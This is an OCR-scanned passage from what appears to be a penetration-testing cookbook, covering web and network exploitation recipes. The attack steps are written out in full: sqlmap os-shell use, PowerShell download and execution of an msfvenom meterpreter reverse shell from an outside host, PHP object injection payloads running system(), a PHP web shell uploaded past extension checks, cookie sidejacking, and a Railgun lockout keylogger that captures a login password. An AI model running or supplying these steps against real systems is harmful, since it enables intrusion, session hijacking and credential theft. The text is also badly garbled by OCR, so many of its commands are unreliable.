<IFRAME SRC='f' onerror="{JAVASCRIPT}*> </IFRAME> 7: 


« > | 








17. Next, we capture the request we need to validate XSS on. 


18. We select the Send to Intruder option: 






t: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:7.0.1) 

ext/html, application/xhtml+xml,application/xml;q=0.9,*/*;q= 
ge: en-us,en;q=0.5 

Send to Spider 

Do an active scan 


Do a passive scan 
Send to Intruder 





19. Then, we switch to the Intruder window, and under the Positions tab, we set the position where we 
want our XSS payloads to be tested. The value surrounded by s is where the payloads will be 
inserted during the attack: 


Attack type: | Sniper 





20. Inthe Payloads tab, we select the Payload type as extension-generated: 


| Target | Positions | Payloads | Options 


(2) Payload Sets 











You can define one or more payload sets. The number of payload sets depends on the 








ways. 
Payload set: | 1 J Payload count: unknown 
Payload type: | Extension-generated \¥| Request count: unknown 


21. In Payload Options, we click on the Select generator... and choose XSS Validator Payloads: 


ee Select payload generator 


(2) Payload Options [Extension-genen (2) Select the extension-provided payload generator that you 


want to use. Burp extensions can be loaded using the 
This payload type invokes a Burp extension, Extender tool. 


Extension payload generator: | XSS Validator Payloads | ¥ 


Selected generator: [NOT SELECTED] 


Select generator ... 





= | {ok | Cancel | = 


(2) Payload Processing 





22. Next, we switch to the XSS Validator tab and copy Grep Phrase; this phrase can be customized as 
well: 


Grep Phrase fy7sdufsuidfhuisdf 





23. Next, we switch to the Options tab in the Intruder and add the copied phrase in the Grep - Match: 





(2) Grep - Match 
YY) These settings can be used to flag result items containing specified expressions. 
@ Flag result items with responses matching these expressions: 
paste.) | fy7sdufsuidthuisdf 
: Load ... 
Remove >» 





Clear 
—_—_—- 











Add | | fy7sdufsuidfhuisdf 


Match type: @ Simple string 





24. We click on Start attack, and we will see a window pop up: 


Filter: Showing all items 


Request | Payload | Status |Error | Timeout | Length _| fy7s... ¥| Comment 


1 <script>alert(299792458)<... 200 1] O 
3 <script>confirm(29979245... 200 O OD 4345 
8 <scr ipt>prompt(29979245... 200 O O 4346 
12 “> <script>prompt(2997924... 200 O OD 4345 ¥ 
19 ‘> <script>confirm(2997924... 200 & OD 4346 ¥) 
Af ‘> <script>alert(299792458)... 200 Oo a} 4033 v7) 
27 <SCRIPT>confirm(2997924... 200 O O 4346 ed) 
66 <<SCRIPT>console.log(299... 200 @ O 4353 ¥) 
68 <<SCRIPT>prompt(299792... 200 O & 4348 ed) 


25. Here, we will see that the requests with a check mark in our Grep Phrase column have been 
successfully validated: 





Injection attacks with sqlmap 


The sqimap tool is an open source tool built in Python, which allows the detection and exploitation of SQL 
injection attacks. It has full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft 
Access, IBM Db2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB, and Informix databases. In this 
recipe, we will cover how to use sqlmap to test and exploit SQL injection. 


How to do it... 


The following are the steps to use sqimap: 


1. We first take a look at the help of sqimap for a better understanding of its features. This can be done 
using the following command: 


| sqlmap -h 
The following screenshot shows the output for the preceding command: 


:~# sqlmap -h 
e: python sqlmap [options] 


and exit 


Show basic help message 
ssage and exit 
n 

( 


Show advanced help 
--version Show program's ver 
-v VERBOSE Verbosity level: 0 


number and exit 
default 1) 


= 
0 


Ss 

m 
Si 
se) 


Target: 
At least one of these options has to be provided to define the 
target (s) 


-u URL, --url=URL Target URL (e.g. "http://www .site.com/vuln.php?id=1") 
sre fn 10 101) Mi mD)0)5 1,4 Process Google dork results as target URLs 





2. Toscana URL, we use the following command: 


| sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" 


3. Once a SQL has been detected, we can choose yes (y) to skip other types of payloads: 


it looks Like the back-end DBMS is ‘MySQL'. Do you want to skip test payloads sp 
ecific for other DBMSes? [Y/n] Y_ 





4. Once SQL has been detected, we can list the database names using the --abs flag: 





5. We have the databases now; similarly, we can use flags such as --tables and --columns to get table 
names and column names: 


veb application technology: Nginx, PHP 5.3.10 
back-end DBMS: MySQL 5.0.12 


AVailable databases [2]: 
*] acuart 
*] information schema 





*] shutting down at 00:06:16 


6. To check whether the user is a database administrator, we can use the --is-dba flag: 





:~# sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --is-dba_ 


7. The sqimap command has a lot of flags. We can use the following table to see the different types of 


flags and what they do: 


Flag 


--tables 


--os-cmd 


--os-shell 


--dump-all 


--tamper 


' ' 
ra =l 


--eta 


. 


Operation 


Dumps all table names 


Specifies a table name to perform an operation on 


Executes an operating system command 


Prompts a command shell to the system 


Specifies a filename to run the SQL test on 


Dumps everything 


Uses a tamper script 


Shows estimated time remaining to dump data 





We can manually choose a database and perform injection for specific database types 
only 


dbs=MYSql,MSSQL, Oracle 


-- proxy Specifies a proxy 





See also 


e The Backdoors using web shells recipe 
e The Backdoors using meterpreters recipe 


Owning all .svn and .git repositories 


This tool is used to rip version controlled systems such as SVN, Git, and Mercurial/hg, Bazaar. The tool 
is built in Python and is pretty simple to use. In this recipe, you will learn how to use the tool to rip the 
repositories. 


This vulnerability exists because most of the time when using a version-controlled system, developers 
host their repository in production. Leaving these folders allows a hacker to download the whole source 
code. 


How to do it... 


The following steps demonstrate the use of repositories: 


1. We can download aves-ripper.git from GitHub using: 


| git clone https://github.com/kost/dvcs-ripper.git 


2. We browse the dvcs-ripper directory: 


# cd /root/dvcs-ripper/ 


# 





3. To rip a Git repository, the command is very simple: 


| rip-git.pl -v -u http://ww.example.com/.git/ 


4. We let it run and then we should see a .git folder created, and in it, we should see the source code: 


ac 


agreements akamai apple-app-site- assets common.php css 
association. 


an fF BH 


csvtiles dummy.php faq_samnple.csv favicon.ico tonts Geol? mages 
magesCw9000113 magesCW 9000114 mg 5s JSON_Logs maxmindGeolp merchantDocument 
~$-PM2301,png ~S-PM2301.png $ 
mints newuploed.csv order_summary.odf peppertry.pnp pupload 


test_pdf Trendsutra updateworkorder.cs var 


5. Similarly, we can use the following command to rip SVN: 


| rip-svn.pl -v -u http://ww.example.com/.svn/ 


Winning race conditions 


Race conditions occur when an action is being performed on the same data in a multiple threaded web 
application. It basically produces unexpected results when the timing of one action being performed will 
impact the other action. 


Some examples of an application with the race condition vulnerability can be an application that allows 

transfer of credit from one user to another or an application that allows a voucher code to be added for a 
discount that can also have a race condition, which may allow an attacker to use the same code multiple 

times. 


How to do it... 


We can perform a race condition attack using Burp's Intruder as follows: 


1. We select the request and click on Send to Intruder: 


h; Intel Mac A¢ vy 19 12+ re 
Send to Spider 

Do an active scan 

Do a passive scan 


= 8 Send to Intruder 








Send to Repeater 


Send to Sequencer 
Send to Comparer 
Send to Decoder 





2. We switch to the Options tab and set the number of threads we want, 20 to 25 are good enough usually: 

















(2) Request Engine 
(Z) These settings control the engine used for making HTTP requests when performing attacks. 
Number of threads: 26 
a | 
Number of retries on network failure: 3 
Pause before retry (milliseconds): 2000 
Throttle (milliseconds): @ Fixed 0 
© Variable: start 0 step 30000 1 
Start time: © Immediately 
© In 10 minutes 
© Paused 





3. Then, in the Payloads tab, we choose Null payloads in Payload type as we want to replay the same 
request: 





(2) Payload Sets 


You can define one or more payload sets. The number of payload sets depends on the attack type 
ways. 


Payload set: (a | Payload count: 50 
Payload type: | Null payloads jy) Request count: 50 





(2) Payload Options [Null payloads] 


This payload type generates payloads whose value is an empty string. With no payload markers co 


@ Generate (50 payloads 


© Continue indefinitely 


4. Then, in the Payload Options, we choose the number of times we want the request to be played. 
5. Since we don't really know how the application will perform, we cannot perfectly guess the number 


of times we need to replay the request. 
6. Now, we click on Start attack. If the attack is successful, we should see the desired result. 


See also 


You can refer to the following articles for more information: 


@ http://antoanthongtin.vn/P ortals/0/UploadImages/kiennt2/KyYeu/DuLieuTrongNuoc/Duliew/KyYeu/07.race-condition-attacks-in-the-web 
.pdf 

@ =https://sakurity.com/blog/2015/05/21/starbucks. html 

© = http://www.theregister.co.uk/2016/10/21/linux_privilege_escalation_hole/ 


Exploiting JBoss with JexBoss 


JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and other Java 
Application Servers (for example, WebLogic, GlassFish, Tomcat, Axis2, and so on). 


It can be downloaded at https://github.com/joaomatosf/jexboss. 


How to do it... 


We begin with navigating to the directory in which we cloned our JexBoss and then follow the given 
steps: 


1. We install all the requirements using the following command: 


| pip install -r requires.txt 


The following screenshot is an example of the preceding command: 


“e Ae anaes 


s# pip install -r require 





2. To view the help, we type this: 


| python jexboss.py -h 


The following screenshot shows the output of the preceding command: 
# python jexboss.py -h 


--version] [--auto-exploit] [--disable-check-updates] 
= tandalone, auto-scan, file-scan}] [--proxy PROXY] 
--proxy-cred LOGIN: PASS] [--jboss-login LOGIN:PA 
--timeout TIMEOUT] [-host HOST] [-network Nenatestal 
-ports PORTS] [-results FILENAME] [-file FILENAME_HOSTS] 
-out FILENAME RESULTS] 





3. To exploit a host, we simply type the following command: 


| python jexboss.py -host http://target_host:8080 


The following screenshot is an example of the preceding command: 


ss# python jexboss.py -host 192.168.2.101:8080 





This shows us the vulnerabilities. 





4. We type yes to continue exploitation: 





5. This gives us a shell on the server: 


[Tyt 
Shell> whoami 





Exploiting PHP Object Injection 


PHP Object Injection occurs when an insecure user input is passed through the PHP unserialize() function. 
When we pass a Serialized string of an object of a class to an application, the application accepts it, and 
then PHP reconstructs the object and usually calls magic methods if they are included in the class. Some 

of the methods are __construct(), _destruct(), _sleep(), and __wakeup(). 


This leads to SQL injections, file inclusions, and even remote code execution. However, in order to 
successfully exploit this, we need to know the class name of the object. 


How to do it... 


The following steps demonstrate PHP Object Injection: 


1. Here, we have an app that is passing serialized data in the get parameter: 


/xvwa/vulnerabilities/php_object_injection/?r=a:2:{i:0;s:4:"XVWA";i: 1;5:33:"Xtreme%20Vulnerable%20Web%20Appiication";} 


me Though PHP Object Injection is not a very common vuinerability and also difficult to explo 
vulnerbility as this could lead an attacker to perform different kinds of malicious attacks, suc 
structions Traversal and Denial of Service, depending on the application context. PHP Object Injection 
inputs are not sanitized properly before passing to the unserialize() PHP function at the 
stup / Reset serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call 


injection into the application scope. 


Read more about PHP Object Injection 
ls https://www.owasp.org/index.php/PHP_Object_Injection 
QL Injection 


aL Injection (Blind) 


S$ Command Injection CLICK HERE 


ATH Injection 
XVWA - Xtreme Vulnerable Web Application 


ormula Injection 


2. Since we have the source code, we will see that the app is using _ wakeup() function and the class 
Name is PHPObjectInjection: 


<?php 
class PHPObjectInjection{ 
public $inject; 
function __construct(){ 


} 


function _ wakeup(){ 
if(isset($this->inject)){ 
eval ($this->inject); 
} 
} 
} 
if(isset($_REQUEST['r'])){ 


$varl=unserialize($_REQUEST['r']); 


3. Now we can write a code with the same class name to produce a serialized object containing our 
own command that we want to execute on the server: 


<?php 
class PHPObjectInjection{ 
public $inject = "system('whoami');"; 
} 


$o0bj = new PHPObjectInjection; 
var_dump(serialize($obj)); 
2?> 


4. We run the code by saving it as a PHP file, and we should have the serialized output: 


MacBook-Air:Desktop Himanshu$ php serialize.php 
stringa(68) "0:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system( 'whoami');";}" 


5. We pass this output into the r parameter and we see that here, it shows the user: 


n/?r=0:18:"PHPObjectinjection":1:{s:6:"inject":s:17:"system(%27whoami%27);""} 





PHP Object Injection 


Though PHP Object Injection is not a very common vulnerability and also difficult to exploit, but it is 
vulnerbility as this could lead an attacker to perform different kinds of malicious attacks, such as Code 
Traversal and Denial of Service, depending on the application context. PHP Object Injection vulnerabil 
inputs are not sanitized properly before passing to the unserialize() PHP function at the server si 
serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() calls, resulting 
injection into the application scope. 


Read more about PHP Object Injection 
https://www.owasp.org/index.php/PHP_Object_Injection 


CLICK HERE 


daemon 


6. Let's try passing one more command, uname -a. We generate it using the PHP code we created: 


<?php 
class PHPObjectInjection 
public $inject = “system('uname —a');"; 
$obj = new PHPObjectInjection; 


var_dump(serialize($obj)); 
?> 


7. And we paste the output in the URL: 


php_object_injection/?r=0:1 8:"PHPObjectinjection":1:{s:6:"inject";s:19:"system('uname -a');":} 








— PHP Object Injection 


Though PHP Object Injection is not a very common vulnerability and also difficult to exploit, bt 
vulnerbility as this could lead an attacker to perform different kinds of malicious attacks, such as 
Traversal and Denial of Service, depending on the application context. PHP Object Injection vuln 


8. Now we see the command being executed and the output is as follows: 


CLICK HERE 


Darwin MacBook-Air.local 16.1.0 Darwin Kernel Version 16.1.0: Thu Oct 13 21:26:57 PDT 2016; root:xnu- 
3789.21.3~60/RELEASE_X86_64 x86_64 


See also 


@ https://mukarramkhalid.com/php-object-injection-serialization/#poi-example-2 
@ https://crowdshield.com/blog.php?name=exploiting-php-serialization-object-injection-vulnerabilities 
@ https://www.evonide.com/how-we-broke-php-hacked-pormmhub-and-earned-20000-dollar/ 


Backdoors using web shells 


Shell uploads are fun; uploading web shells gives us more power to browse around the servers. In this 
recipe, you will learn some of the ways in which we can upload a shell on the server. 


How to do it... 


The following steps demonstrate the use of web shells: 


1. We first check whether the user is DBA by running sqlmap with the --is-dba flag: 


[12:38:38] [INFO] the back-end DBMS is Microsoft SQL Server 
web server operating system: Windows 2003 or XP 

web application technology: ASP.NET, Microsoft IIS 6.0, ASP 
back-end DBMS: Microsoft SQL Server 2008 

[12:38:38] [INFO] testing if current user is DBA 


current user is DBA: True 
[12:38:39] [WARNING] HTTP error codes detected during run: 
50@ (Internal Server Error) — 1 times 


[12:38:39] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/vide 


2. Then, we use os-she11, which prompts us with a shell. We then run the command to check whether we 
have privileges: 


| whoami 


The following screenshot is an example of the preceding command: 


os-shell> whoami 

do you want to retrieve the command standard output? [Y/n/a] 
[12:44:04] [INFO] the SQL query used returns 1 entries 
[12:44:05] [INFO] retrieved: nt authority\\\\system 

command standard output [1]: 

[*] nt authority\system 


3. Luckily, we have admin rights. But we don't have RDP available to outside users. Let's try another 
way to get meterpreter access using PowerShell. 


4. We first create an object of system.net .webclient and save it as a PowerShell script on the system: 


| echo $WebClient = New-Object System.Net.WebClient > abc.ps1 


5. Now we create Our meterpreter.exe Via msfvenom using the following command: 


msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> 
LPORT=<Your Port to Connect On> -f exe > shell.exe 


6. Now, we need to get our meterpreter downloaded, so we append the following command in our 
abc.psi script: 


echo $WebClientDownloadFile(http://odmain.com/meterpreter.exe, 
"D:\video\b.exe") >> abc.psi 


The following screenshot is an example of the preceding command: 


os-shell> echo $WebClient = New-Object System.Net.WebClient > 3.psl 
do you want to retrieve the command standard output? [Y/n/a] Y 
[20:57:14] [INFO] retrieved: 1 

[20:57:15] [INFO] retrieving the length of query output 

[20:57:15] [INFO] retrieved: 

[20:57:16] [INFO] retrieved: 


command standard output [1]: 


[x] 


os-shell> echo $WebClient.DownloadFile("htt 1.exe", "D:\video\b.exe") >> 3.psl 
do you want to retrieve the command standard output? [Y/n/a] Y 

[20:57:27] [INFO] retrieved: 1 

[20:57:28] [INFO] retrieving the length of query output 

[20:57:28] [INFO] retrieved: 

[20:57:28] [INFO] retrieved: 

command standard output [1]: 

[*] 





7. By default, PowerShell is configured to prevent the execution of .psi scripts on Windows systems. 
But there's an amazing way to still execute scripts. We use the following command: 


| powershell -executionpolicy bypass -file abc.ps1 


The following screenshot is an example of the preceding command: 


os-shell> powershell -executionpolicy bypass -file 3.ps1 

do you want to retrieve the command standard output? [Y/n/a] Y 
[20:58:03] [INFO] retrieved: 1 

[20:58:04] [INFO] retrieving the length of query output 
[20:58:04] [INFO] retrieved: 

[20:58:05] [INFO] retrieved: 

command standard output [1]: 


[x] 





8. Next, we go to the directory p:/video/meterpreter.exe Where our file was downloaded and execute it 
using the following command: 


| msfconsole 


The preceding command will open up msf as shown in the following screenshot: 


msf > use exploit/multi/handler 
msf exploit( ) > set PAYLOAD windows/meterpreter/reverse_tc 
PAYLOAD => windows/meterpreter/reverse_tcp_dns 
msf exploit ( ) > set LHOST é 
LHOST => ange me ‘as 
msf exploit( ) > set LPORT 4444 
LPORT => 4444 
expLoit ( ) > set Encoder x86/shikata_ga_nai 
Encoder => x86/shikata_ga_nai 
msf exploit( ) > set EXITFUNC process 
EXITFUNC => process 
msf exploit( ) > set ExitOnSession false 
ExitOnSession => false 
msf exploit( ) > set Iterations 5 
Iterations => 5 


F expLloit( ) > exploit -j 
] Exploit running as background job. 
Handler failed to bind to 1 
Started reverse TCP handler on 0.0.0.0:4444 
Starting the payload handler... 
Sending stage (957487 bytes) 1 





Backdoors using meterpreters 


Sometimes, we may also come across a file upload that is initially meant to upload files such as Excel, 
photos, and so on, but there are a few ways through which we can bypass it. In this recipe, you will see 
how to do that. 


How to do it... 


The following steps demonstrate the use of meterpreters: 


1. Here, we have a web application that uploads a photo: 





2. When we upload a photo, this is what we see in the application: 


cos oo 





3. Let's see what happens if we upload a .txt. We create one with test as the data: 





a> test.txt x 


test | 


4. Let's try uploading it: 


EE coo 0 





5. Our image has been deleted! This might mean our application is doing either a client-side or a 
server-side check for file extension: 


6. Let's try to bypass the client-side check. We intercept the request in Burp and try to alter the 
extension in the data submitted: 


ept- 


7. Now we change the extension from .txt to .txt;.png and click on forward: 


os x3 





This is still being deleted, which tells us that the application might be having a server-side check. 


One of the way to bypass it would be to add a header of an image along with the code we want to 
execute. 


8. We add the header crrs7a and try to upload the file: 


And then we upload this: 





9. We see that the file has been uploaded. 
10. Now we try to add our PHP code: 
<?php 


$output = shell_exec('ls -lart'); 
echo "<pre>$output</pre>"; 


?> 


But our PHP has not been executed still. 


11. However, there are other file formats too, such as .pht, .phtmi, .phtm, .htm, and so on. Let's try . pnt. 


Our file has been uploaded. 


es CS Ce 





12. We browse the file and see that it has been executed! 


@® localhost pload/test : 


GIF87a; 
Notice: Undefined index: c in /Applications/XAMPP/xamppfiles/htdocs/aa/upload/test1.php.pht on line 1 


Warning: system(): Cannot execute a blank command in /Applications/K AMPP/xamppfiles/htdocs/aa/upload/test1.phy 


13. Let's try executing a basic command: 


?c=whoami 


@ localhost/aa/upload/test1.php.pht?c=whoam 









GIF87a;daemon 


We can see that our command has been successfully executed and we have uploaded our shell on the 
server. 


Network Exploitation on Current Exploitation 


In this chapter, we will cover the following recipes: 


Man in the middle with hamster and ferret 
Exploring the msfconsole 

Using the paranoid meterpreter 

A tale of a bleeding heart 

Redis exploitation 

Say no to SQL— owning MongoDBs 
Embedded device hacking 

Elasticsearch exploit 

Good old Wireshark 

This is Sparta! 


Introduction 


Exploiting networks is often a technique that comes in handy. A lot of times, we may find that the most 
vulnerable point in a corporate is in the network itself. In this recipe, you will learn about some of the 
ways in which we can pentest a network and successfully exploit the services we find. 


Man in the middle with hamster and ferret 


Hamster is a tool that can be used for sidejacking. It acts as a proxy server, while ferret is used for 
sniffing cookies in the network. In this recipe, we will look at how to hijack some sessions! 


Getting ready 


Kali already has the tool preinstalled, so let's see how to run it! 


How to do it... 


Hamster is extremely easy to use and comes with a UI too. Follow the given steps to learn the use of 
hamster: 


1. We start by typing the following command: 


| hamster 


The following screenshot shows the output for the preceding command: 


root@kali: ~ 


:~# hamster 
--- HAMPSTER 2.0 side-jacking tool --- 
Set browser to use proxy http://127.0.0.1:1234 
G: set_ports option(1234) 


mg_open_listening_port (1234) 
listening on 127.0.0.1:1234 
egining thread 





2. Now we just need to fire up our browser and navigate to http: //localhost :1234: 


File Edit View History Bookmarks Tools Help 
Hamster x op 


¢€ localhost 


fi Most VisitedY Hl offensive Security SS Kali Linux Kali Docs Kali Tools  Exploit-DB 


HAMSTER 2.0 Side-Jacking 


=-- no 


clone 
STEPS:In order to sidejack web sessions, follow the 
targe SECOND, wait a few seconds and make sure packets 
click on that target to "clone" it's session. FIFTH, pt 


[ adapters | help ] 


a them conflict with the cloned targets. again 
TIPS: remember to refresh this page occasoinally to 
browser 
No target WHEN SWITCHING target, rember to close all win 
has been Status 
selected 


yet Proxy: unknown 


Adapters: none 
Packets: 0 
Database: 0 
Targets: 0 


3. Next, we need to click on adapters and choose the interface we want to monitor: 


Hamster x op 
¢ localhost 


f Most Visited Hl offensive Security Kali Linux Kali Docs Kali Tools ™® Exploit-DB 


To start monitoring, type in the adapter name and hit the [Sul 
=-- lo mode monitoring. You may have to first configure the adapter 


clone ethO Submit Query 
targe 


No target 
has been 
selected 
yet 


4. We will wait for a while and we will see sessions in the tab on the left-hand side tab: 





wo Hamster x 
¢€ 127.0.0.1 


Hamster - lceweasel (Private Browsing) e0oe°90 


v *eotf 


lost Visited ¥ ensive Securt ali Linux aliWocs als Tools Exploit ircrack=m 
Most Visited Off Security “\KaliL kali D Kali T Exploit-DB WA kong 


192.168.0.106 


cookies 





HAMSTER 2.0 Side-Jacking 








TIPS: remember to refresh this page o 
sure to purge all cookies from the brow 
WHEN SWITCHING target, rember to cl 
and purge al] cookies first 
Status 
Proxy: unknown 
Adapters: none 
Packets: 0 
Database: 768 
Tarqets: 4 






se all windows in your browser 


If you don't see sessions after a few minutes, it may be because hamster and ferret are not 
in the same folder. Hamster runs and executes ferret along with it in the background. 


Some users may face problems because ferret is not supported on 64-bit architecture. We 
need to add a 32-bit repository and then install ferret. It can be done using: dpkg --add- 
architecture i386 && apt-get update && apt-get install ferret-sidejack: i386. 


Exploring the msfconsole 


We have already covered some basics of Metasploit in the previous chapters. In this recipe, you will 
learn some techniques to use meterpreter and Metasploit for more efficient exploitation. 


How to do it... 


To learn about Metasploit follow the given steps: 


1. Let's start the Metasploit console, by typing msfconsole: 


/ Metasploit! \ 


Trouble managing data? List, sort, group, tag and search your pentest data 
in Metasploit Pro -- learn more on http://rapid7.com/metasploit 


3.5-de 
Ss - 914 auxiliary - 27 
471 payloads - 39 encoders - 9n 
Free Metasploit Pro trial: http://r-7.co/trymsp 


Te A Lt 


] 
] 
] 
] 





2. To see the list of exploits available, we use the following command: 


| show exploits 


The following screenshot shows the output for the preceding command: 


al/ibstat_path 
i $PATH Privilege Escalation 


ndar Manager Service Daemon (rpc.cmsd) Opc 


ttdbserverd_realpath 
ToolTalk rpc.ttdbserverd tt_internal_realpath Buff 





android/adb/adb_server_exec 


3. Similarly, in order to see the list of payloads, we use the following command: 


| show payloads 


The following screenshot shows the output for the preceding command: 


w payloads 


normal 
ell, Bind TCP Inline 
hell_find_port normal 
ell, Find Port Inline 
Lll_interact normal 


normal 
Inline 
normal 
rse HTTP Stager 
Folate imenmers normal 
Android Meter ae igenne| verse HTTPS Stager 
android/meterpreter/reverse tcp normal 





4. Metasploit also comes with hundreds of auxiliary modules that contain scamners, fuzzers, sniffers, 
and so on. To see the auxiliary, we use the following command: 


| show auxiliary 


The following screenshot shows the output for the preceding command: 


DY =\~ ou an oh ese) a} 


admin/2wire/xslt_password_reset 

2Wire Cross-Site Request Forgery Password Reset Vulnerability 
admin/android/google play_store uxss xframe_rce 

Android Browser RCE Through Google Play Store XFO 
admin/appletv/appletv_display_image 

Apple TV Image Remote Control 
admin/appletv/appletv_display_video 

Apple TV Video Remote Control 

admin/atg/atg client 

Veeder-Root Automatic Tank Gauge (ATG) Administrative Client 
admin/backupexec/ dump 

Veritas Backup Exec Windows Remote File Access 
admin/backupexec/ registry 





5. Let's use an FTP fuzzer with the following command: 


| use auxiliary/fuzzers/ftp/ftp_client_ftp 


6. We will see the options using the following command: 


| show options 


7. We set the RHOSTS using the following command: 


| set RHOSTS x.x.x.x 


8. We now run the auxiliary, which notifies us in case a crash happens: 


Connecting tc n port 21 
[Pha i jithout command - 2017-02-16 23:5 
Character 
-> 
-—> 


pany 
ray 


-> 
-> 
-> 
-> 
-> 
-> 
-> 
-> 
-> 
-> 
-> 
-> 
-> 


\ 
et 
et 
it 
t 
it 
t 
et 
et 
ie 
t 
t 
t 
t 
et 
et 





Railgun in Metasploit 


In this recipe, we learn more about Railgun. Railgun is a meterpreter—only Windows exploitation 
feature. It allows direct communication to Windows API. 


How to do it... 


Railgun allows us to perform a lot of tasks that Metasploit cannot, such as pressing keyboard keys and so 
on. Using this, we can use Windows API calls to perform all the operations we need to for even better 


post exploitation: 


1. We have already seen in the previous chapters on getting a meterpreter session. We can jump into 
Railgun from meterpreter by typing the irb command: 


meterpreter > irb 
] Starting IRB shell 


The 'client' variable holds the meterpreter client 





am | 


2. To access Railgun, we use the session.railgun Command: 


>> session.railgun 

=> #<Rex: :Post: :Meterpreter: : Extensions: :Stdapi: :Railgun: :Railgun:0x0000001290e2e8 @client 
2.115) "NT AUTHORITY\SYSTEM @ CORELAN XP3">, @dlls={"user32"=>#<Rex: :Post::Meterpreter:: 
L_path="user32", @win_consts=#<Rex: :Post: :Meterpreter: : Extensions: :Stdapi: :Railgun: :WinCo 
"=>65535, "MCI DGV SETVIDEO TINT"=>16387, "EVENT TRACE FLAG PROCESS"=>1, "TF LBI TOOLTIP" 
11, "FKF_AVAILABLE"=>2, "LINE AGENTSTATUSEX"=>29, "REGDF GENFORCEDCONFIG"=>32, " i 
ED"=>32, "“BTH ERROR PAIRING NOT ALLOWED"=>24, "“CMSG HASH DATA PARAM"=>21, “DNS ERROR _INCO 
_MEMORY_BUFFER"=>0, "TASK LAST WEEK"=>5, "DISPID COLLECTION RESERVED MAX"=>2047, “MSIM DI9 
QI"=>3221495810, "FLICK WM HANDLED MASK"=>1, "NS NISPLUS"=>42, "WM SYSCHAR"=>262, "NDR MA 
>3, "ICC PAGESCROLLER CLASS"=>4096, "SUBLANG CORSICAN FRANCE"=>1, "IMAGE REL _IA64 PCREL60 
SHIELD"=>512, "DDE FDEFERUPD"=>16384, "OS NT40RGREATER"=>3, "DISK LOGGING DUMP"=>2, " i 
DBT VOLLOCKUNLOCKFAILED"=>32838, "WM GETICON"=>127, "SEC WINNT AUTH IDENTITY VERSION"=>514 
DLE TYPE"=>9, "MCGIP_CALENDARBODY"=>6, "EVENT SYSTEM DIALOGEND"=>17, "MFOUTPUTATTRIBUTE S( 
"MCI _CD OFFSET"=>1088, "CRED MAX DOMAIN TARGET NAME LENGTH"=>256, "ERROR DS SIZELIMIT EXCg 
HEIGHT"=>1048576, "EVENT TRACE CONTROL STOP"=>1, "BTH ERROR QOS IS NOT SUPPORTED"=>39, "D 
TY"=>4, "IP_UNICAST IF"=>31, "LDAP_OPT VERSION"=>17, "“CLUSAPI CHANGE ACCESS"=>2, "SND NOS 
TOCONTROLHEIGHT"=>36, "CTRY CANADA"=>2, "FWPM ACTRL_CLASSIFY"=>16, "SERVICE STOP REASON F 
RY TYPE MISMATCH"=>1922, "DMBIN LARGECAPACITY"=>11, "SOUND SYSTEM BEEP"=>3, "SQL FD FETCH 





We see that a lot of data has been printed. These are basically the available DLL's and functions 
we Can use. 


3. To have a better view in order to see the DLL names, we type the command: 
| session. railgun.known_d11_names 
The following screenshot shows the output for the preceding command: 


>> session.railgun.known dll names 


=> ["kernel32", "ntdll", "user32", "ws2 32", "iphlpapi", "advapi32", "shel132", "netapi32", 





4. To view a function of a .a11, we use the following command: 


| session. railgun.<d1llname>. functions 


The following screenshot shows the output for the preceding command: 


>> session. railgun.kernel32. functions 

=> {"GetConsoleWindow"=>#<Rex: :Post: :Meterpreter: :Extensions: :Stdapi: :Railgun: : 
LLFunction:0x000000054088c8 Greturn_type="LPVOID", G@params=[], @windows name="Gq 
tConsoleWindow", @calling conv="stdcall">, "ActivateActCtx"=>#<Rex: :Post: :Meter 


reter: :Extensions: :Stdapi: :Railgun: :DLLFunction:0x00000005543288 @return type=" 
OOL", @params=[["HANDLE", "hActCtx", "inout"], ["PBLOB", "LpCookie", "out"]], @ 
indows name="ActivateActCtx", @calling conv="stdcall">, "AddAtomA"=>#<Rex: :Post 
‘Meterpreter: :Extensions: :Stdapi: :Railgun: :DLLFunction: 0x00000005542b30 @return 





5. Let's try to call an API, which will lock the screen of the victim. We can do that by typing the 
following command: 


| client .railgun.user32.LockWorkStation( ) 


We can see that we are locked out: 


Corelan 
Logged on 





6. Let's imagine a situation where we want to obtain a user's login password. We have the hash, but we 
are unable to crack it. Using Railgun, we can call the Windows API to lock the screen and then run a 
key logger in the background, so when the user logs in, we will have the password. Metasploit 
already has a post exploitation module that uses Railgun to do this; let's try it! 


We exit Our irb and put our meterpreter session in the background and then we use the module: 


| use post/windows/capture/lockout, keylogger 
The following screenshot shows the output for the preceding command: 


>> exit 
meterpreter > background 


Backgrounding session l... 
mst exploit( ) > use post/windows/capture/lockout keylogger 





7. We add our session using the set session Command. 
8. Then, we set the PID of the winlogon.exe here: 


| set PID <winlogon pid> 


9. Next, we run and we can see the password that the user has entered: 


sf post( eal 


WINLOGON PID:856 specified. I'm trusting you... 

Migrating from PID:900 

Migrated to WINLOGON PID: 856 successfully 

Keylogging for NT AUTHORITY\SYSTEM @ CORELAN XP3 
|} System has currently been idle for 151 seconds 

Locking the workstation falied, trying again.. 

Locked this time, time to start keyloggin... 


Starting the keystroke sniffer... 

Keystrokes being saved in to /root/.msf4/logs/scripts/smartlocker/192.168.2.115 20170312.1418.txt 
| Recording 

System has currently been idle for 154 seconds and the screensaver is OFF 

Password?: abcd <Return> 

They logged back in, the last password was probably right. 

Stopping keystroke sniffer... 

Post module execution completed 





There's more... 


This is just an example of a function call we see. We can use Railgun to perform lots of other actions, 
such as delete admin user, insert into the registry, create our own DLLS, and so on. 


For more information, visit: 
https://www.defcon.org/images/defcon-20/dc-20-presentations/Maloney/DEFCON-20-Maloney-Railgun. pdf. 


Using the paranoid meterpreter 


Sometime during 2015, hackers realized it was possible to steal/hijack someone's meterpreter session by 
simply playing around with the victim's DNS and launching their own handler to connect. This then led to 
the development and release of meterpreter paranoid mode. They introduced an API that verified the 
SHA1 hash of the certificate presented by the msf at both ends. In this recipe, we will see how to use the 
paranoid mode. 


How to do it... 


We will need an SSL certificate to begin with: 


1. We can generate our own using the following commands: 


